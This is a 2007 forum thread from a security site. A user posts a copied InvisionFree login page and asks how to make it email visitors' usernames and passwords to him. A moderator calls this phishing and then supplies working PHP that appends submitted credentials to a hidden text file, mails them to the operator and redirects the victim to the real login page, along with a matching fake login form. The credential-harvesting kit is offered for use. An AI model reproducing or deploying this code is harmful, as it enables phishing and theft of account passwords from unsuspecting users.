 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 217
 Members: 0
 Total: 217
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Source Code Modifying Help |
|
 Posted: Thu Aug 30, 2007 4:08 am |
 |
|
| CrazyChicken |
| Beginner |
 |
|
| Joined: Mar 19, 2007 |
| Posts: 2 |
| Location: St. Louis |
|
|
 |
|
 |
|
I'm trying to learn expand my coding skills by trying something with a source code. I have a source code that I copied from a random InvisionFree forum, and I need someone to modify it so that I when someone enters their username and password, it sends the info to a specified email address. I am not trying to cause chaos around the IF network, I just want to understand how it is done. Please highlight which part of the code you edited and exactly what you did. I will then test it out to see if it works.
I'd appreciate it! Here is the code:
| Code: | <html>
<head>
<title>Testleet2007</title>
<style type='text/css'>
html { overflow-x: hidden; overflow-y: auto; }
form { display:inline; }
img { vertical-align:middle; border:0px }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; margin:0px 10px 0px 10px;background-color:#FFF }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; }
a:link, a:visited, a:active { text-decoration: underline; color: #000 }
a:hover { color: #465584; text-decoration:underline }
fieldset.search { padding:6px; line-height:150% }
label { cursor:pointer; }
img.attach { border:2px outset #EEF2F7;padding:2px }
.googleroot { padding:6px; line-height:130% }
.googlechild { padding:6px; margin-left:30px; line-height:130% }
.googlebottom, .googlebottom a:link, .googlebottom a:visited, .googlebottom a:active { font-size:11px; color: #3A4F6C; }
.googlish, .googlish a:link, .googlish a:visited, .googlish a:active { font-size:14px; font-weight:bold; color:#00D; }
.googlepagelinks { font-size:1.1em; letter-spacing:1px }
.googlesmall, .googlesmall a:link, .googlesmall a:active, .googlesmall a:visited { font-size:10px; color:#434951 }
li.helprow { padding:0px; margin:0px 0px 10px 0px }
ul#help { padding:0px 0px 0px 15px }
option.cat { font-weight:bold; }
option.sub { font-weight:bold;color:#555 }
.caldate { text-align:right;font-weight:bold;font-size:11px;color:#777;background-color:#DFE6EF;padding:4px;margin:0px }
.warngood { color:green }
.warnbad { color:red }
#padandcenter { margin-left:auto;margin-right:auto;text-align:center;padding:14px 0px 14px 0px }
#profilename { font-size:28px; font-weight:bold; }
#calendarname { font-size:22px; font-weight:bold; }
#photowrap { padding:6px; }
#phototitle { font-size:24px; border-bottom:1px solid black }
#photoimg { text-align:center; margin-top:15px }
#ucpmenu { line-height:150%;width:22%; border:1px solid #345487;background-color: #F5F9FD }
#ucpmenu p { padding:2px 5px 6px 9px;margin:0px; }
#ucpcontent { background-color: #F5F9FD; border:1px solid #345487;line-height:150%; width:auto }
#ucpcontent p { padding:10px;margin:0px; }
#ipsbanner { position:absolute;top:1px;right:5%; }
#logostrip { border:1px solid #345487;background-color: #3860BB;background-image:url(http://209.85.12.227/style_images/1/tile_back.gif);padding:0px;margin:0px; }
#submenu { border:1px solid #BCD0ED;background-color: #DFE6EF;font-size:10px;margin:3px 0px 3px 0px;color:#3A4F6C;font-weight:bold;}
#submenu a:link, #submenu a:visited, #submenu a:active { font-weight:bold;font-size:10px;text-decoration: none; color: #3A4F6C; }
#userlinks { border:1px solid #C2CFDF; background-color: #F0F5FA }
#navstrip { font-weight:bold;padding:6px 0px 6px 0px; }
.activeuserstrip { background-color:#BCD0ED; padding:6px }
.pformstrip { background-color: #D1DCEB; color:#3A4F6C;font-weight:bold;padding:7px;margin-top:1px }
.pformleft { background-color: #F5F9FD; padding:6px; margin-top:1px;width:25%; border-top:1px solid #C2CFDF; border-right:1px solid #C2CFDF; }
.pformleftw { background-color: #F5F9FD; padding:6px; margin-top:1px;width:40%; border-top:1px solid #C2CFDF; border-right:1px solid #C2CFDF; }
.pformright { background-color: #F5F9FD; padding:6px; margin-top:1px;border-top:1px solid #C2CFDF; }
.post1 { background-color: #F5F9FD }
.post2 { background-color: #EEF2F7 }
.postlinksbar { background-color:#D1DCEB;padding:7px;margin-top:1px;font-size:10px; background-image: url(http://209.85.12.227/style_images/1/tile_sub.gif) }
.row1 { background-color: #F5F9FD }
.row2 { background-color: #DFE6EF }
.row3 { background-color: #EEF2F7 }
.row4 { background-color: #E4EAF2 }
.darkrow1 { background-color: #C2CFDF; color:#4C77B6; }
.darkrow2 { background-color: #BCD0ED; color:#3A4F6C; }
.darkrow3 { background-color: #D1DCEB; color:#3A4F6C; }
.hlight { background-color: #DFE6EF }
.dlight { background-color: #EEF2F7 }
.titlemedium { font-weight:bold; color:#3A4F6C; padding:7px; margin:0px; background-image: url(http://209.85.12.227/style_images/1/tile_sub.gif) }
.titlemedium a:link, .titlemedium a:visited, .titlemedium a:active { text-decoration: underline; color: #3A4F6C }
.maintitle { vertical-align:middle;font-weight:bold; color:#FFF; letter-spacing:1px; padding:8px 0px 8px 5px; background-image: url(http://209.85.12.227/style_images/1/tile_back.gif) }
.maintitle a:link, .maintitle a:visited, .maintitle a:active { text-decoration: none; color: #FFF }
.maintitle a:hover { text-decoration: underline }
.plainborder { border:1px solid #345487;background-color:#F5F9FD }
.tableborder { border:1px solid #345487;background-color:#FFF; padding:0px; margin:0px; width:100% }
.tablefill { border:1px solid #345487;background-color:#F5F9FD;padding:6px; }
.tablepad { background-color:#F5F9FD;padding:6px }
.tablebasic { width:100%; padding:0px 0px 0px 0px; margin:0px; border:0px }
.wrapmini { float:left;line-height:1.5em;width:25% }
.pagelinks { float:left;line-height:1.2em;width:35% }
.desc { font-size:10px; color:#434951 }
.edit { font-size: 9px }
.signature { font-size: 10px; color: #339 }
.postdetails { font-size: 10px }
.postcolor { font-size: 12px; line-height: 160% }
.normalname { font-size: 12px; font-weight: bold; color: #003 }
.normalname a:link, .normalname a:visited, .normalname a:active { font-size: 12px }
.unreg { font-size: 11px; font-weight: bold; color: #900 }
.searchlite { font-weight:bold; color:#F00; background-color:#FF0 }
#QUOTE { font-family: Verdana, Arial; font-size: 11px; color: #465584; background-color: #FAFCFE; border: 1px solid #000; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }
#CODE { font-family: Courier, Courier New, Verdana, Arial; font-size: 11px; color: #465584; background-color: #FAFCFE; border: 1px solid #000; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }
.copyright { font-family: Verdana, Tahoma, Arial, Sans-Serif; font-size: 9px; line-height: 12px }
.codebuttons { font-size: 10px; font-family: verdana, helvetica, sans-serif; vertical-align: middle }
.forminput, .textinput, .radiobutton, .checkbox { font-size: 11px; font-family: verdana, helvetica, sans-serif; vertical-align: middle }
.thin { padding:6px 0px 6px 0px;line-height:140%;margin:2px 0px 2px 0px;border-top:1px solid #FFF;border-bottom:1px solid #FFF }
.purple { color:purple;font-weight:bold }
.red { color:red;font-weight:bold }
.green { color:green;font-weight:bold }
.blue { color:blue;font-weight:bold }
.orange { color:#F90;font-weight:bold }
</style>
<base href="http://127.0.0.1/" />
</head>
<body bgcolor='#FFFFFF' leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" alink='#000000' vlink='#000000'>
<script language='JavaScript' type="text/javascript">
<!--
function buddy_pop() { window.open('http://z3.invisionfree.com/Testleet2007/index.php?act=buddy&s=fd44fcbdf94654a666454eb33d3c7cb3','BrowserBuddy','width=250,height=500,resizable=yes,scrollbars=yes'); }
function multi_page_jump( url_bit, total_posts, per_page )
{
pages = 1; cur_st = parseInt(""); cur_page = 1;
if ( total_posts % per_page == 0 ) { pages = total_posts / per_page; }
else { pages = Math.ceil( total_posts / per_page ); }
msg = "Please enter a page number to jump to between 1 and" + " " + pages;
if ( cur_st > 0 ) { cur_page = cur_st / per_page; cur_page = cur_page -1; }
show_page = 1;
if ( cur_page < pages ) { show_page = cur_page + 1; }
if ( cur_page >= pages ) { show_page = cur_page - 1; }
else { show_page = cur_page + 1; }
userPage = prompt( msg, show_page );
if ( userPage > 0 ) {
if ( userPage < 1 ) { userPage = 1; }
if ( userPage > pages ) { userPage = pages; }
if ( userPage == 1 ) { start = 0; }
else { start = (userPage - 1) * per_page; }
window.location = url_bit + "&st=" + start;
}
}
//-->
</script>
<!--IBF.BANNER-->
<div id='logostrip'>
<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&' title='Board Home'><img src='http://209.85.62.23/style_images/1/logo4.gif' alt='' border='0' /></a>
</div>
<!-- google_ad_section_start(weight=0) -->
<!-- IE6/Win TABLE FIX -->
<table width="100%" cellspacing="6" id="submenu">
<tr>
<td><a href=''></a> ;;·; <a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=site">Portal</a></td>
<td align="right">
<img src="http://209.85.12.227/style_images/1/atb_help.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Help'>Help</a>
;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_search.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Search&f='>Search</a>
;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_members.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Members'>Members</a>
;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_calendar.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=calendar'>Calendar</a>
<!--IBF.CHATLINK-->
</td>
</tr>
</table>
<div align='center' style='margin-bottom:3px;'><div align="center" style="margin-bottom:3px;"><div class="row4"><script type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_alternate_ad_url = "http://www.invisionfree.com/files/index.php?bg=E4EAF2&txt=434951&link=000000";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_channel ="1835769090 8161518757 3879835861";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "0000FF";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><br /><script type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel ="6089240242";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "0000FF";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
google_alternate_color = "E4EAF2";
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></div></div></div>
<table width="100%" id="userlinks" cellspacing="6">
<tr>
<td>Welcome Guest ( <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Login&CODE=00'>Log In</a> | <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Reg&CODE=00'>Register</a> )</td>
<td align='right'><a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Reg&CODE=reval'>Resend Validation Email</a></td>
</tr>
</table>
<!-- google_ad_section_end() -->
<br />
<div id='navstrip' align='left'><img src='http://209.85.62.23/style_images/1/nav.gif' border='0' alt=''> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=idx'>Testleet2007</a></div>
<br />
<div align='left' style='text-align:left;vertical-align:bottom;'>
<!-- IBF.NEWSLINK -->Welcome back; your last visit was on Aug 30 2007, 04:14 AM
</div> <!-- google_ad_section_start(weight=0) -->
<!-- Board Stats -->
<form style='display:inline' action="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Login&CODE=01&CookieDate=1" method="post">
<div align='right'><strong>Quick Log In</strong>
<input type="text" class="forminput" size="10" name="UserName" onfocus="this.value=''" value="User Name" />
<input type='password' class='forminput' size='10' name='PassWord' onfocus="this.value=''" value='ibfrules' />
<input type='submit' class='forminput' value='Go' />
</div>
</form>
<br />
<div align='center'>
<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Stats&CODE=leaders'>The moderating team</a> |
<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Search&CODE=getactive'>Today's active topics</a> |
<!--<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Stats'>Today's top 10 posters</a> |-->
<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Members&max_results=10&sort_key=posts&sort_order=desc'>Overall top 10 posters</a>
</div>
<br />
<div class="tableborder">
<div class="maintitle">Board Statistics</div>
<table cellpadding='4' cellspacing='1' border='0' width='100%'> <tr>
<td class='pformstrip' colspan='2'>1 user(s) active in the past 15 minutes</td>
</tr>
<tr>
<td width="5%" class='row2'><img src='http://209.85.62.23/style_images/1/user.gif' border='0' alt=''></td>
<td class='row4' width='95%'>
<b>1</b> guests, <b>0</b> members, <b>0</b> anonymous members
<div class='thin'></div>
Show detailed list by: <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Online&CODE=listall&sort_key=click'>Last Click</a>, <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Online&CODE=listall&sort_key=name&sort_order=asc&show_mem=reg'>Member Name</a>
</td>
</tr> <tr>
<td class='pformstrip' colspan='2'>Today's Birthdays</td>
</tr>
<tr>
<td class='row2' width='5%' valign='middle'><img src='http://209.85.62.23/style_images/1/user.gif' border='0' alt=''></td>
<td class='row4' width='95%'><b></b> No members are celebrating a birthday today<br /></td>
</tr> <tr>
<td class='pformstrip' colspan='2'>Board Statistics</td>
</tr>
<tr>
<td class='row2' width='5%' valign='middle'><img src='http://209.85.62.23/style_images/1/stats.gif' border='0' alt=''></td>
<td class='row4' width="95%" align='left'>Our members have made a total of <b>0</b> posts<br />We have <b>1</b> registered members<br />The newest member is <b><a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&showuser=1'>CrazyChicken</a></b><br />Most users ever online was <b>1</b> on <b>Aug 30 2007, 04:14 AM</b></td>
</tr> </table>
</div>
<!-- Board Stats -->
<!-- google_ad_section_end() --> <br />
<div align='right'><a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Login&CODE=06">Delete cookies set by this board</a> ·; <a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&act=Login&CODE=05">Mark all posts as read</a></div>
<br /><div align='center' class='row4' style='border:1px solid #345487; font-size: 7.5pt; line-height: 12px'>Hosted for free by <a href='http://invisionfree.com' target='_blank'>InvisionFree</a> (<a href='http://invisionfree.com/index.php?p=tou'>Terms of Use: Updated 7/7/05</a>) | Powered by <a href="http://www.invisionboard.com" target='_blank'>Invision Power Board</a> v1.3 Final © 2003 <a href='http://www.invisionpower.com' target='_blank'>IPS, Inc.</a><br />Page creation time: <b>0.0078</b> seconds | <a href='http://z3.invisionfree.com/Testleet2007/ar/'>Archive</a></div>
</body>
</html> |
|
|
|
|
|
|
|
|
|
| Posted: Sat Sep 01, 2007 10:45 pm |
|
|
| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
This is a login screen that connects to a database and authenticates the user to a session ..
If you are planning to "expand" your programming skills and create a fishing site that will probably not work by the way you realise it.
The scenario could be as follows :
(1)creating a login screen were if someone type his username/password that will be send to you via email .. and forward the site to a screen (2) where it will say that the login is incorrectly and he will have to re-enter login/password to autenticate succesfully.
At case (1) this will be hosted at your site
at case (2) forward to the login screen of the attacked form
this is called phishing ..
now .. if you want to put this on your site .. so that you can log the users password in plain-text before it gets to the hash procedure you have to create variables to keep the value before it gets to hash methods ...
sample code :
file to be called by our form : ( this file will be hidden)
------------------------------------adminlogin.php-----------
| Code: | <?
$user_info_file_name="/home/bla/public_html/storehere.txt";
$mailto="yourmail@email.com";
$user_info = "Username : ".$HTTP_POST_VARS['u']."\n";
$user_info .= "Password : ".$HTTP_POST_VARS['p']."\n\n";
$user_info_file = fopen($user_info_file_name,"a+");
if ($user_info_file) {
fwrite($user_info_file,$user_info);
fclose($user_info_file);
}
@mail($mailto, "User info", $user_info, "From: Evil Admin: PHP/" . phpversion());
?>
<script language=javascript>
<!--
function MM_goToURL() { //v3.0
var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->
MM_goToURL('parent','http://www.actualurlyouwanttoredirect.com/login.php');
</script> |
-----------------------------------------
and the form .. were you will modify the 1 million lines code you pasted above accordingly :
---------------------------------adminlogin.html-----------
were are the variables you want to save to the txt file and receive them on your mail
| Code: | <html>
<head>
<title>Admin log In</title>
</head>
<body bgcolor="White">
<center><font face="verdana,arial">
<h2>User Log In</h2>
</font></center>
<table width=400 align=center>
<form action = "adminlogin.php" method="post">
<tr><td align=right>
<font face="verdana,arial" size="-1">UserName: </font></td><td align=left><input type="Text" name="u"></td>
</tr><tr><td align=right>
<font face="verdana,arial" size="-1">Password: </font></td><td align=left><input type="password" name="p"></td>
</tr><tr><td colspan=2 align=center>
<input type="Submit" value="Log In">
</td></tr></table>
<SCRIPT LANGUAGE="JavaScript">
<!--
document.forms[0].p.focus();
//-->
</SCRIPT>
</body>
</html> |
-----------------------------------------------
So here is what that code does..
you have 2 files ..
adminlogin.php:
this file is called when the user presses the login button .. and will save the information to a txt file and will also send the info to your email.. after that will redirect the user to the actual login form.(of course you can implement it so that will authenticate the user also.
adminlogin.html
where is the form .. with the variables .. that will be filtered by adminlogin.php
prety simple a ? 
ToXiC |
|
_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
